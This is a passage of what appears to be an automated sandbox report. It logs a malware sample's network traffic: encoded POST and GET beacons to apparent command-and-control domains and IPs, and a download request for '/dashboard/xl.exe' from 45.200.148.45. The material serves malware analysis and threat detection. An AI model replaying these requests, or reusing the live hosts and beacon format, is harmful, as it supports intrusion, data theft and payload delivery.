                                                                        Data Ascii: 9B_ppt=HYugaIXnf+P98j1pw1hOimuTF+PtL+KNdLny4EIfHpuhesSndZyfsRwV7OnyUdWeC/Yym3+9uCzSJq3AJ1JGK8KT/iOHN2nHmSO1BDe5RFTqlQaJ2sfr5VfGiD6hwPGYaHwtx8YrrqqHMs4um9l1VGOi9hqrN921IB9VBl80MbYgkFhJWew9rVJ9zXPcQzG1PSdW8SSH2d0wKcxwPR2oVY6pmPj5Vzr5Ojy0Iu9ulNxLXG+1Ad9conm755dSr5Zsm73stduP+xgFBvSyrJ86lqx6YU8r/LTfE//TJid6GtfTl9QohB6aN6lBSvRCxtYF0w6nMS7SSNpKVuZ+/ftKkPylHWkgOkPt5FV85PAdOa6Gi9EpBskpvDqSD77CIyth/w8gkhuGpyOlqJxP5D6JdZnvftAF0OX4x6KJHwPJnWZdSVfpWZYXlIz99eIV12gPUj2eNGTsw7YgR0RMmcQndmgEqPT5JY4VRXeSiOT7WbOPq2OmNms6T+wnCPvbLUxpGaRnIpYnsKodgFt/jgsc9jChusKYNSeq/WyGOF46NZ823Sz89rMGJfbzZau/cBq2teDH74xE6OO929+d2e3sLQrE9CQcsa5fLXjWDqYh4c3XxciBpH0uOZ0cPRnIH3zlkunRcmoiApE2PrvzqEn2Z39RZTLhfTGmpfupkEFgbaw8m0DwCdHEjHJipftBiKBEoidrI5cVwnA4jAGQ8INsplFwEnycqu7QY3bsUrhWbV3PGnuNp5U6T33by+TyjaHbLhuWuRoDHU8GfxEe8iHCdVXnaeF/sYYaTDn/2s5mZ4UGrmHzupdeknl8qwqZYkKTQ6568UxE7zvLSQB8vaX13g349Pxsr+Hw1MDNEEiJDEpAQX96LXbz1mdgz5aONTqxeuieGfsyY6wClAbImWP1/olWFMngUghyuAyKIdLQxEwtwrRuPAOCjn42ajb0X9NjcyztbNvJVGhBp5lFj+rgPJfOIHaczvmkT2J+Ft3CKrWTp [TRUNCATED]
                                                                        Dec 13, 2024 13:07:25.936115980 CET1236INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Fri, 13 Dec 2024 12:07:25 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"66cce1df-b96"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                        Dec 13, 2024 13:07:25.936146975 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.449786161.97.142.144805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:07:27.315848112 CET512OUTGET /fc2m/?Sbv8I=RfPDYvIHtJXp8&9B_ppt=KaGAZ9vwQsncwU5nwlZluG2PCpLyPNSLaK7d9k0MP6z2D5ilW5umnwpx9tHUSLWoKaQi0X2AhHSzaYzkOXBuKcmexX+9MUXLmjX2PXKDTiDXtSOs+tfg8AM= HTTP/1.1
                                                                        Host: www.030002128.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:07:28.567853928 CET1236INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Fri, 13 Dec 2024 12:07:28 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 2966
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: "66cce1df-b96"
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                        Dec 13, 2024 13:07:28.567878962 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                        Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                        Dec 13, 2024 13:07:28.567894936 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                        Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.449802209.74.64.58805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:07:34.109224081 CET785OUTPOST /0b3u/ HTTP/1.1
                                                                        Host: www.quicktraze.website
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.quicktraze.website
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.quicktraze.website/0b3u/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 67 55 39 73 56 6d 6d 56 77 55 41 48 36 35 79 32 35 44 69 77 2b 74 67 7a 50 44 4a 77 4b 4f 48 73 48 74 54 77 48 55 4f 51 4a 52 48 6b 54 5a 47 53 4e 67 61 50 51 35 43 76 70 35 48 6d 72 34 68 62 35 70 61 65 49 61 4c 79 5a 53 57 38 43 37 78 75 6d 4c 78 4a 6a 4b 56 41 39 4c 4e 54 2f 37 36 71 74 67 39 41 2f 4b 6f 74 5a 37 6b 32 42 56 4a 6b 37 44 42 46 4b 64 33 4a 67 54 66 6a 4d 56 33 66 7a 4f 54 44 43 64 54 36 37 55 35 6e 4f 4f 63 41 6d 63 50 38 46 39 44 42 59 48 44 72 65 79 58 56 6d 32 7a 62 71 6c 50 4e 70 64 59 4f 56 35 56 6d 39 32 79 59 34 63 78 77 36 74 6a 46 4b 66 47 4c 73 67 3d 3d
                                                                        Data Ascii: 9B_ppt=gU9sVmmVwUAH65y25Diw+tgzPDJwKOHsHtTwHUOQJRHkTZGSNgaPQ5Cvp5Hmr4hb5paeIaLyZSW8C7xumLxJjKVA9LNT/76qtg9A/KotZ7k2BVJk7DBFKd3JgTfjMV3fzOTDCdT67U5nOOcAmcP8F9DBYHDreyXVm2zbqlPNpdYOV5Vm92yY4cxw6tjFKfGLsg==
                                                                        Dec 13, 2024 13:07:35.326441050 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Fri, 13 Dec 2024 12:07:35 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.449813209.74.64.58805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:07:36.772923946 CET805OUTPOST /0b3u/ HTTP/1.1
                                                                        Host: www.quicktraze.website
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.quicktraze.website
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.quicktraze.website/0b3u/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 67 55 39 73 56 6d 6d 56 77 55 41 48 6f 4c 6d 32 2f 67 4b 77 34 4e 67 79 42 6a 4a 77 54 65 48 6f 48 74 58 77 48 58 44 4e 4f 6a 6a 6b 53 34 32 53 4d 69 79 50 54 35 43 76 69 5a 48 2f 31 49 68 4d 35 70 57 57 49 59 50 79 5a 55 36 38 43 37 42 75 6d 62 4e 4b 69 61 56 65 32 72 4e 52 37 37 36 71 74 67 39 41 2f 4b 38 48 5a 37 38 32 42 6c 35 6b 70 78 70 47 57 4e 33 4b 33 6a 66 6a 66 46 33 54 7a 4f 53 67 43 63 2f 55 37 58 52 6e 4f 4c 59 41 6d 4f 6e 39 4b 39 43 4b 56 6e 43 53 57 42 32 44 71 6b 36 31 6f 54 53 70 69 76 4d 4a 51 2f 59 38 73 48 54 50 71 63 56 44 6e 71 71 78 48 63 37 43 33 73 6c 69 35 41 74 7a 4a 6d 4a 54 67 4d 50 64 62 54 6b 4c 68 34 4d 3d
                                                                        Data Ascii: 9B_ppt=gU9sVmmVwUAHoLm2/gKw4NgyBjJwTeHoHtXwHXDNOjjkS42SMiyPT5CviZH/1IhM5pWWIYPyZU68C7BumbNKiaVe2rNR776qtg9A/K8HZ782Bl5kpxpGWN3K3jfjfF3TzOSgCc/U7XRnOLYAmOn9K9CKVnCSWB2Dqk61oTSpivMJQ/Y8sHTPqcVDnqqxHc7C3sli5AtzJmJTgMPdbTkLh4M=
                                                                        Dec 13, 2024 13:07:38.014288902 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Fri, 13 Dec 2024 12:07:37 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.449819209.74.64.58805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:07:39.433037996 CET10887OUTPOST /0b3u/ HTTP/1.1
                                                                        Host: www.quicktraze.website
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.quicktraze.website
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.quicktraze.website/0b3u/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 67 55 39 73 56 6d 6d 56 77 55 41 48 6f 4c 6d 32 2f 67 4b 77 34 4e 67 79 42 6a 4a 77 54 65 48 6f 48 74 58 77 48 58 44 4e 4f 6a 72 6b 53 50 65 53 4e 45 36 50 53 35 43 76 72 35 48 69 31 49 68 4e 35 70 4f 53 49 59 43 48 5a 58 4f 38 44 59 35 75 32 34 56 4b 6f 61 56 65 35 4c 4e 53 2f 37 36 2f 74 67 4e 45 2f 4b 73 48 5a 37 38 32 42 6d 68 6b 2b 7a 42 47 47 39 33 4a 67 54 65 69 4d 56 33 33 7a 4f 4c 62 43 63 4c 71 36 6d 78 6e 41 4c 49 41 72 64 50 39 48 39 43 49 55 6e 43 6a 57 42 37 64 71 6b 6d 54 6f 54 50 4d 69 74 51 4a 51 61 6c 77 2f 54 54 41 2b 66 4e 48 35 4d 69 52 50 4f 44 43 30 75 6b 65 6f 6b 64 56 66 57 39 54 37 4d 58 56 43 42 38 78 69 76 37 4b 79 56 63 6d 75 74 2f 49 73 34 74 71 64 46 59 59 46 4f 6d 49 52 4a 50 4f 43 31 6a 41 6b 6e 30 6b 54 70 34 63 33 4a 31 78 73 5a 70 69 35 71 73 48 58 4f 75 75 37 73 66 76 66 6a 34 33 51 72 76 65 7a 48 6e 71 77 52 37 4b 4a 78 54 4e 45 2f 51 6e 54 32 53 39 39 68 65 5a 51 5a 4a 43 54 4b 39 50 65 39 2f 58 4a 71 4d 46 39 67 59 64 6e 54 43 4a 49 57 65 [TRUNCATED]
                                                                        Data Ascii: 9B_ppt=gU9sVmmVwUAHoLm2/gKw4NgyBjJwTeHoHtXwHXDNOjrkSPeSNE6PS5Cvr5Hi1IhN5pOSIYCHZXO8DY5u24VKoaVe5LNS/76/tgNE/KsHZ782Bmhk+zBGG93JgTeiMV33zOLbCcLq6mxnALIArdP9H9CIUnCjWB7dqkmToTPMitQJQalw/TTA+fNH5MiRPODC0ukeokdVfW9T7MXVCB8xiv7KyVcmut/Is4tqdFYYFOmIRJPOC1jAkn0kTp4c3J1xsZpi5qsHXOuu7sfvfj43QrvezHnqwR7KJxTNE/QnT2S99heZQZJCTK9Pe9/XJqMF9gYdnTCJIWeq9xVsuIHLdSvQBYDbQ4jZLxtEa7zEbkSkY+g0hO0brdZ0Dn9GMrLthVFRCIRtcERusXYkN4qGrVToQqAv2luU1uSb+OjqL75Cucu4U7h3H5x0crku8uzf6Y8swSuxDZ+TP08ejoyqqYuHLXFWYC4vqwos0CrQ1DabJLj3TtV3CcW9uxLdnaFlNenUVBg+BHJ5ESGFlOCl1kpIv/l2tSO+S1kbvlvQ/CZMATWbBgONXw4tCyrvMPxpskYVm+9Kx1c3S2SGmWQO+joySZGxj3PucGc3eEO0KH4Iq/ykl1bNb2ybPSEVNth0AKPLr6eJBzbU5x1UIm2YuRsefUR2/ANEh++fML5woF1QYViIib4jhoQbi3h8UHVlZoWKOKh9ZqabTLxQeuvi2rAPXxOlNuf8HzTT3j3EU8RVH4un3doiz0vNB4rqaWHHT4NOd70RzDKPgiYh0SIuBJ9PciQ7mpw1sDxP9+EAUHRy+sGGIM2EunKPzdS3qJadWucghlpWLVG55fK1IIOwkXIReOAHN6d49pMqdAXHpCcMPVo4IVRIeCOWLWWkhPrnwnV24Y4OA2nuLmf91NDdw85ogfhhmB6J04uO3BcXM9GuO512OhsuCL60tFZxuFh9J1C/X+E/vishrUDhBkZDnLaFzpO6J2k7KOvayby9X+5nL [TRUNCATED]
                                                                        Dec 13, 2024 13:07:40.717149973 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Fri, 13 Dec 2024 12:07:40 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.449825209.74.64.58805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:07:42.084146023 CET517OUTGET /0b3u/?9B_ppt=tWVMWWWOulwRw9KA3wu02d5KKGx3TcL9CpbeAEn5Jw6VZuj1AgCYZL+g8ZTCy/ZQwoOBNq7+YyWmcbYUwrN2tYgo9+cX77aYkG8YuMsAadwBJ35R4yxBFts=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
                                                                        Host: www.quicktraze.website
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:07:43.304805994 CET219INHTTP/1.1 200 OK
                                                                        Date: Fri, 13 Dec 2024 12:07:43 GMT
                                                                        Server: Apache
                                                                        Content-Length: 68
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Raw: 76 57 4a 57 4c 47 75 45 75 45 63 69 71 59 36 56 2f 68 72 48 67 4a 77 7a 5a 33 52 33 4b 71 43 58 58 64 69 52 65 79 65 55 65 68 6e 43 54 62 4c 46 47 67 4b 48 62 4f 6d 50 73 74 66 4b 35 4e 35 45 2b 71 6d 77
                                                                        Data Ascii: vWJWLGuEuEciqY6V/hrHgJwzZ3R3KqCXXdiReyeUehnCTbLFGgKHbOmPstfK5N5E+qmw


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.44983645.200.148.45801908C:\Windows\SysWOW64\recover.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:07:46.392812014 CET232OUTGET /dashboard/xl.exe HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Host: 45.200.148.45
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
